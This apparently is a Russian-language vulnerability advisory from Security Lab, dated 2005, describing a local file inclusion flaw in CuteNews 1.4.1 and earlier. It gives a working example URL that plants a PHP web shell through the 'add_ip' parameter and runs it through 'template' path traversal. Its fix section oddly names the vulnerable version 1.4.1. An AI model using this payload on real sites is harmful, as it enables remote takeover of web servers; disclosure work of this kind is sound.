Security Lab

PHP-инклюдинг в CuteNews

Дата публикации:07.11.2005
Дата изменения:26.01.2009
Всего просмотров:3159
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: CuteNews 1.x
Уязвимые версии: CuteNews 1.4.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "template" в сценариях "show_archives.php" и "show_news.php". Удаленный пользователь может подключить и выполнить произвольный локальный файл на целевой системе. Злоумышленник может внедрить PHP код в файл "inc/ipban.mdu" с помощью параметра "add_ip" и затем выполнить его с привилегиями web сервера. Пример:

http://[target]/cute141/show_archives.php?template=
../inc/ipban.mdu%00&member_db[1]=1&action=add&
add_ip=<?php%20system($_GET[cmd]);?>

URL производителя: www.cutephp.com

Решение: Установите последнюю версию 1.4.1 с сайта производителя.

Журнал изменений:

26.01.2009
Изменена секция «Решение».

Ссылки: CuteNews "template" Local File Inclusion Vulnerability